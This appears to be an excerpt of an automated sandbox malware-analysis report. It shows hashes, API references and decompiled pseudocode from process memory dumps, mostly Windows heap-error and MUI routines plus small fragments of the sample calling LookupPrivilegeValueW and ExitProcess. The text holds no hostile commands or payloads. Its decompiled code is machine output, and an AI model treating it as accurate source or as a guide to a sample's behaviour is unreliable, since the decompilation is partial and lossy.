Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 59391c5e11f167e5dbe23f0656a9380a297fcfa3b65dd95ded7aab8eafd70cc2
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: E3E01AB12002086BDB10DF49CC85EE777ADAF88650F018155BA0957241C934F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3E6, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3E0

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9d8f7c9fcb3dfb729d68ba5bda16375bdc59c39b2faff46056d63ae22a720858
Instruction ID: 079d0fd3f3dccd310c0eb8b55e94bdbf8aae1bc89ba20fa2ee18365f0100e557
Opcode Fuzzy Hash: 9d8f7c9fcb3dfb729d68ba5bda16375bdc59c39b2faff46056d63ae22a720858
Instruction Fuzzy Hash: D8E08CB15041046BCB10EF65DC80DE7776CAF842147018256FD085B202C534E9258BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A290, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A290(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a293
0x0041a2aa
0x0041a2b8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 0f5b6569f0fd1189fef647496f38c461ee85f3cd89d543d30868c9d99a5dee31
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: A5D017726042187BD620EB99CC85FD777ACDF487A0F0180A9BA1D6B242C535BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A28F, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A28F(intOrPtr _a4, int _a8) {
				void* _t10;

				asm("repe push ebp");
				_t5 = _a4;
				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a28f
0x0041a293
0x0041a2aa
0x0041a2b8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8

Memory Dump Source

Source File: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: fa8be4a33c4788ddbcb138313edcf27e03f69fbb80710448d302c6ee56f91b8c
Instruction ID: 36533cdac004842daeb1a24d7fb9cded641cd0a960d04a9028d6b0e2cd92a30b
Opcode Fuzzy Hash: fa8be4a33c4788ddbcb138313edcf27e03f69fbb80710448d302c6ee56f91b8c
Instruction Fuzzy Hash: 1CD05E716003047BD620DF59CC85FD777AC9F48750F018068BA196B242C534FA00CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 0155967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01559694

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5930438248d5a25ce1e9554564eecef7b1547d6a2b77aa36e2dbe7c146fa77ee
Instruction ID: 1fba90c165afe36eebdc63dcd324bb11afc579c79b5ba413ac1b2b6d2f87de19
Opcode Fuzzy Hash: 5930438248d5a25ce1e9554564eecef7b1547d6a2b77aa36e2dbe7c146fa77ee
Instruction Fuzzy Hash: 70B09B719414C5C5E751D7A5460871B795477D0745F16C452D1420B41F477CC095F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 015CB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 015CB323
The instruction at %p tried to %s , xrefs: 015CB4B6
an invalid address, %p, xrefs: 015CB4CF
<unknown>, xrefs: 015CB27E, 015CB2D1, 015CB350, 015CB399, 015CB417, 015CB48E
Go determine why that thread has not released the critical section., xrefs: 015CB3C5
The resource is owned exclusively by thread %p, xrefs: 015CB374
*** enter .exr %p for the exception record, xrefs: 015CB4F1
write to, xrefs: 015CB4A6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 015CB2F3
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 015CB314
This failed because of error %Ix., xrefs: 015CB446
The instruction at %p referenced memory at %p., xrefs: 015CB432
*** enter .cxr %p for the context, xrefs: 015CB50D
read from, xrefs: 015CB4AD, 015CB4B2
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 015CB47D
a NULL pointer, xrefs: 015CB4E0
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 015CB476
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 015CB53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 015CB305
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 015CB2DC
*** Resource timeout (%p) in %ws:%s, xrefs: 015CB352
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 015CB39B
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 015CB484
The resource is owned shared by %d threads, xrefs: 015CB37E
*** then kb to get the faulting stack, xrefs: 015CB51C
*** An Access Violation occurred in %ws:%s, xrefs: 015CB48F
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015CB3D6
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015CB38F
The critical section is owned by thread %p., xrefs: 015CB3B9
*** Inpage error in %ws:%s, xrefs: 015CB418

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: c9e00f4cd9c853935047c4f82445993eb0bf0e4897c60a4dd1d757886d0918a5
Instruction ID: cf7d5ca9c6f76f17be7f2206d611e35bbac61dfbdc57688947970347d767379e
Opcode Fuzzy Hash: c9e00f4cd9c853935047c4f82445993eb0bf0e4897c60a4dd1d757886d0918a5
Instruction Fuzzy Hash: 1481D075A40211BFDB266ECA8C86D7F7F76BF96ED1B80404CF5042F152E2668851CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 015D1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E015D1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x14f48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0151B150();
				} else {
					E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x160589c);
				E0151B150("Heap error detected at %p (heap handle %p)\n",  *0x16058a0);
				_t27 =  *0x1605898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M015D1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0151B150();
				} else {
					E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0151B150("Error code: %d - %s\n",  *0x1605898);
				_t113 =  *0x16058a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0151B150();
					} else {
						E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0151B150("Parameter1: %p\n",  *0x16058a4);
				}
				_t115 =  *0x16058a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0151B150();
					} else {
						E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0151B150("Parameter2: %p\n",  *0x16058a8);
				}
				_t117 =  *0x16058ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0151B150();
					} else {
						E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0151B150("Parameter3: %p\n",  *0x16058ac);
				}
				_t119 =  *0x16058b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0151B150();
					} else {
						E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16058b4);
					E0151B150("Last known valid blocks: before - %p, after - %p\n",  *0x16058b0);
				} else {
					_t120 =  *0x16058b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0151B150();
				} else {
					E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0151B150("Stack trace available at %p\n", 0x16058c0);
			}

0x015d1c10
0x015d1c16
0x015d1c1e
0x015d1c3d
0x015d1c3e
0x015d1c20
0x015d1c35
0x015d1c3a
0x015d1c44
0x015d1c55
0x015d1c5a
0x015d1c65
0x015d1c67
0x00000000
0x015d1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x015d1c67
0x015d1cdc
0x015d1ce5
0x015d1d04
0x015d1d05
0x015d1ce7
0x015d1cfc
0x015d1d01
0x015d1d0b
0x015d1d17
0x015d1d1f
0x015d1d25
0x015d1d30
0x015d1d4f
0x015d1d50
0x015d1d32
0x015d1d47
0x015d1d4c
0x015d1d61
0x015d1d67
0x015d1d68
0x015d1d6e
0x015d1d79
0x015d1d98
0x015d1d99
0x015d1d7b
0x015d1d90
0x015d1d95
0x015d1daa
0x015d1db0
0x015d1db1
0x015d1db7
0x015d1dc2
0x015d1de1
0x015d1de2
0x015d1dc4
0x015d1dd9
0x015d1dde
0x015d1df3
0x015d1df9
0x015d1dfa
0x015d1e00
0x015d1e0a
0x015d1e13
0x015d1e32
0x015d1e33
0x015d1e15
0x015d1e2a
0x015d1e2f
0x015d1e39
0x015d1e4a
0x015d1e02
0x015d1e02
0x015d1e08
0x00000000
0x00000000
0x015d1e08
0x015d1e5b
0x015d1e7a
0x015d1e7b
0x015d1e5d
0x015d1e72
0x015d1e77
0x015d1e95

Strings

heap_failure_lfh_bitmap_mismatch, xrefs: 015D1CD7
HEAP: , xrefs: 015D1C16, 015D1C3D, 015D1D04, 015D1D4F, 015D1D98, 015D1DE1, 015D1E32, 015D1E7A
heap_failure_virtual_block_corruption, xrefs: 015D1C91
heap_failure_invalid_argument, xrefs: 015D1CAD
heap_failure_generic, xrefs: 015D1C7C
heap_failure_usage_after_free, xrefs: 015D1CBB
heap_failure_internal, xrefs: 015D1C6E
heap_failure_listentry_corruption, xrefs: 015D1CD0
heap_failure_freelists_corruption, xrefs: 015D1CC9
Heap error detected at %p (heap handle %p), xrefs: 015D1C50
Parameter3: %p, xrefs: 015D1DEE
heap_failure_cross_heap_operation, xrefs: 015D1CC2
Error code: %d - %s, xrefs: 015D1D12
heap_failure_buffer_underrun, xrefs: 015D1C9F
Parameter1: %p, xrefs: 015D1D5C
Parameter2: %p, xrefs: 015D1DA5
heap_failure_invalid_allocation_type, xrefs: 015D1CB4
heap_failure_unknown, xrefs: 015D1C75
heap_failure_block_not_busy, xrefs: 015D1CA6
heap_failure_entry_corruption, xrefs: 015D1C83
Stack trace available at %p, xrefs: 015D1E86
heap_failure_buffer_overrun, xrefs: 015D1C98
heap_failure_multiple_entries_corruption, xrefs: 015D1C8A
HEAP[%wZ]: , xrefs: 015D1C30, 015D1CF7, 015D1D42, 015D1D8B, 015D1DD4, 015D1E25, 015D1E6D
Last known valid blocks: before - %p, after - %p, xrefs: 015D1E45

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: bcc0e08880447bdddb2e5f75998b278fcdb9bcc44f1c9dd3ce930143ba121537
Instruction ID: 10f11ea8fad3474e99c3d63deede13e0f1f9633dc544d32e5262231a677726a2
Opcode Fuzzy Hash: bcc0e08880447bdddb2e5f75998b278fcdb9bcc44f1c9dd3ce930143ba121537
Instruction Fuzzy Hash: 3061C432551956DFE333AB8DE8C692573F4FB05920B1B882EF90A5F351D73099508F0A

Uniqueness

Uniqueness Score: -1.00%

Function 01523D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01523D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01521B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01521B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01521B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01521B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01521B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01534620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0155F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01561370(_t276, 0x14f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0155BB40(0,  &_v68, _t170);
									if(L015243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0155BB40(_t257,  &_v68, _t243);
								if(L015243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01561370(_t278, 0x14f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01534620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0155F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01561370(_v16, 0x14f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0155BB40(_t262,  &_v68, _t244);
								if(L015243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01561370(_t282, 0x14f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0155BB40(_t262,  &_v68, _t201);
							if(L015243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01534620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0155F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01561370(_t280, 0x14f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0155BB40(_t267,  &_v68, _t245);
							if(L015243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01561370(_t284, 0x14f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0155BB40(_t267,  &_v68, _t224);
						if(L015243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L015377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01523d3c
0x01523d42
0x01523d44
0x01523d46
0x01523d49
0x01523d4c
0x01523d4f
0x01523d52
0x01523d55
0x01523d58
0x01523d5b
0x01523d5f
0x01523d61
0x01523d66
0x01578213
0x01578218
0x01524085
0x01524088
0x0152408e
0x01524094
0x0152409a
0x015240a0
0x015240a6
0x015240a9
0x015240af
0x015240b6
0x015240bd
0x015240bd
0x01523d83
0x0157821f
0x01578229
0x01578238
0x01578238
0x0157823d
0x0157823d
0x01523da0
0x01523daf
0x01523db5
0x01523dba
0x01523dba
0x01523dd4
0x01523e94
0x01523eab
0x01523f6d
0x01523f84
0x0152406b
0x0152406b
0x0152406e
0x0152406e
0x01524070
0x01524074
0x01578351
0x01578351
0x0152407a
0x0152407f
0x0157835d
0x01578370
0x01578377
0x01578379
0x0157837c
0x0157837c
0x0157835d
0x00000000
0x0152407f
0x01523f8a
0x01523f8d
0x01523f90
0x01523f95
0x0157830d
0x0157830f
0x01523f9b
0x01523fac
0x01523fae
0x01523fb1
0x01523fb1
0x01523fb6
0x01578317
0x0157831a
0x00000000
0x01523fbc
0x01523fc1
0x01523fc9
0x01523fd7
0x01523fda
0x01523fdd
0x01524021
0x01524021
0x01524029
0x01524030
0x01524044
0x01524046
0x01524046
0x01524044
0x01524049
0x01578327
0x01578334
0x01578339
0x0157833c
0x0152404f
0x0152404f
0x0152404f
0x01524051
0x01524056
0x01524063
0x01524063
0x01524068
0x00000000
0x01524068
0x01523fdf
0x01523fe2
0x01523fe4
0x01523fe7
0x01523fef
0x01524003
0x01524005
0x01524005
0x0152400c
0x01524013
0x01524016
0x01524017
0x0152401b
0x0152401e
0x00000000
0x0152401e
0x01523fb6
0x01523eb1
0x01523eb4
0x01523eb7
0x01523ebc
0x015782a9
0x015782ab
0x01523ec2
0x01523ed3
0x01523ed5
0x01523ed8
0x01523ed8
0x01523edd
0x015782b3
0x015782b6
0x00000000
0x01523ee3
0x01523ee8
0x01523eed
0x01523ef0
0x01523ef3
0x01523f02
0x01523f05
0x01523f08
0x015782c0
0x015782c3
0x015782c5
0x015782c8
0x015782d0
0x015782e4
0x015782e6
0x015782e6
0x015782ed
0x015782f4
0x015782f7
0x015782f8
0x015782fc
0x015782ff
0x015782ff
0x01523f0e
0x01523f11
0x01523f16
0x01523f1d
0x01523f31
0x01578307
0x01578307
0x01523f31
0x01523f39
0x01523f48
0x01523f4d
0x01523f50
0x01523f50
0x01523f53
0x01523f58
0x01523f65
0x01523f65
0x01523f6a
0x00000000
0x01523f6a
0x01523edd
0x01523dda
0x01523ddd
0x01523de0
0x01523de5
0x01578245
0x01523deb
0x01523df7
0x01523dfc
0x01523dfe
0x01523e01
0x01523e01
0x01523e06
0x0157824d
0x0157824f
0x01578254
0x00000000
0x01523e0c
0x01523e11
0x01523e16
0x01523e19
0x01523e29
0x01523e2c
0x01523e2f
0x0157825c
0x0157825f
0x01578261
0x01578264
0x0157826c
0x01578280
0x01578282
0x01578282
0x01578289
0x01578290
0x01578293
0x01578294
0x01578298
0x0157829b
0x0157829b
0x01523e35
0x01523e38
0x01523e3d
0x01523e44
0x01523e58
0x015782a3
0x015782a3
0x01523e58
0x01523e60
0x01523e6f
0x01523e74
0x01523e77
0x01523e77
0x01523e7a
0x01523e7f
0x01523e8c
0x01523e8c
0x01523e91
0x00000000
0x01523e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01523E97
Kernel-MUI-Language-SKU, xrefs: 01523F70
Kernel-MUI-Language-Allowed, xrefs: 01523DC0
Kernel-MUI-Number-Allowed, xrefs: 01523D8C
WindowsExcludedProcs, xrefs: 01523D6F

Memory Dump Source

Source File: 00000003.00000002.298699245.00000000014F0000.00000040.00000001.sdmp, Offset: 014F0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: e4b5a31f3f98b0a511788ebb8d1d0a4c66c461b9001a592bf209fd6b978ca70d
Instruction ID: af6e484611b2cde06bb8756a32ed1b9beab417032290c69fd4f9e6562117d3f8
Opcode Fuzzy Hash: e4b5a31f3f98b0a511788ebb8d1d0a4c66c461b9001a592bf209fd6b978ca70d
Instruction Fuzzy Hash: C1F15E72D0062AEFCB11DF98D984AEEBBB9FF59650F15005AE905EB250D7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 015140E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E015140E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0151B150();
					} else {
						E0151B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0151B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0151B150(", passed to %s", _t29);
					}
					_push("\n");
					E0151B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1606378 = 1;
						asm("int3");
						 *0x1606378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x015140e6
0x015140e8
